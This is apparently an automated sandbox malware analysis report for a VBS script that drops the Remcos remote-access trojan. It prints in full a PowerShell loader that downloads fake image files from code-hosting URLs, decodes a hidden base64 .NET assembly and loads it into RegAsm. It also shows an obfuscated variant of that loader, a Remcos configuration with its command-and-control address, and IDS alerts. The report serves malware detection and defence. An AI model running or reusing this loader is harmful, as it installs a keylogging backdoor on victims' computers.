                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.SmniiFI/niam/sdaeh/sfer/ann/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home');
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_doc20241024.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_doc20241024.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_doc20241024.vbs", ProcessId: 3308, ProcessName: wscript.exe
                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.SmniiFI/niam/sdaeh/sfer/ann/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home');
                  Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_doc20241024.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_doc20241024.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_doc20241024.vbs", ProcessId: 3308, ProcessName: wscript.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T

                  Data Obfuscation

                  barindex
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.SmniiFI/niam/sdaeh/sfer/ann/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home');
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-24T08:47:03.786188+020020204231Exploit Kit Activity Detected185.199.108.133443192.168.2.749701TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-24T08:47:03.786188+020020204251Exploit Kit Activity Detected185.199.108.133443192.168.2.749701TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-24T08:46:47.756446+020020365941Malware Command and Control Activity Detected192.168.2.749983154.216.18.512404TCP
                  2024-10-24T08:47:13.088279+020020365941Malware Command and Control Activity Detected192.168.2.749712154.216.18.512404TCP
                  2024-10-24T08:47:22.602331+020020365941Malware Command and Control Activity Detected192.168.2.749761154.216.18.512404TCP
                  2024-10-24T08:47:32.217285+020020365941Malware Command and Control Activity Detected192.168.2.749810154.216.18.512404TCP
                  2024-10-24T08:47:41.706178+020020365941Malware Command and Control Activity Detected192.168.2.749859154.216.18.512404TCP
                  2024-10-24T08:47:51.205328+020020365941Malware Command and Control Activity Detected192.168.2.749905154.216.18.512404TCP
                  2024-10-24T08:48:00.693845+020020365941Malware Command and Control Activity Detected192.168.2.749958154.216.18.512404TCP
                  2024-10-24T08:48:10.219010+020020365941Malware Command and Control Activity Detected192.168.2.749977154.216.18.512404TCP
                  2024-10-24T08:48:19.893680+020020365941Malware Command and Control Activity Detected192.168.2.749978154.216.18.512404TCP
                  2024-10-24T08:48:29.661701+020020365941Malware Command and Control Activity Detected192.168.2.749979154.216.18.512404TCP
                  2024-10-24T08:48:39.444682+020020365941Malware Command and Control Activity Detected192.168.2.749980154.216.18.512404TCP
                  2024-10-24T08:48:48.963788+020020365941Malware Command and Control Activity Detected192.168.2.749981154.216.18.512404TCP
                  2024-10-24T08:48:58.457696+020020365941Malware Command and Control Activity Detected192.168.2.749982154.216.18.512404TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-24T08:46:59.611668+020020490381A Network Trojan was detected185.199.108.133443192.168.2.749699TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-24T08:47:03.551417+020028033053Unknown Traffic192.168.2.749701185.199.108.133443TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 0000000D.00000002.2557660938.0000000000CD5000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["154.216.18.51:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-JX5AIB", "Keylog flag": "", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                  Source: scan_doc20241024.vbsVirustotal: Detection: 17%Perma Link
                  Source: scan_doc20241024.vbsReversingLabs: Detection: 15%
                  Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.1cfdff3d3c8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000D.00000002.2557660938.0000000000CD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4512, type: MEMORYSTR
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0042B1E6 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,13_2_0042B1E6
                  Source: powershell.exe, 00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_b35eefd7-b
                  Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.7:49699 version: TLS 1.2
                  Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1419702608.000001CFCE2EB000.00000004.00000020.00020000.00000000.sdmp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004081F9 FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,13_2_004081F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004072E5 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,13_2_004072E5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00407733 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,13_2_00407733
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00414795 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,13_2_00414795
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00440A59 FindFirstFileExA,13_2_00440A59
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00404CF3 FindFirstFileW,FindNextFileW,13_2_00404CF3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00405C8E __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,13_2_00405C8E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00407FDE FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,13_2_00407FDE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040511A SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,13_2_0040511A

                  Software Vulnerabilities

                  barindex
                  Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49712 -> 154.216.18.51:2404
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49810 -> 154.216.18.51:2404
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49761 -> 154.216.18.51:2404
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49859 -> 154.216.18.51:2404
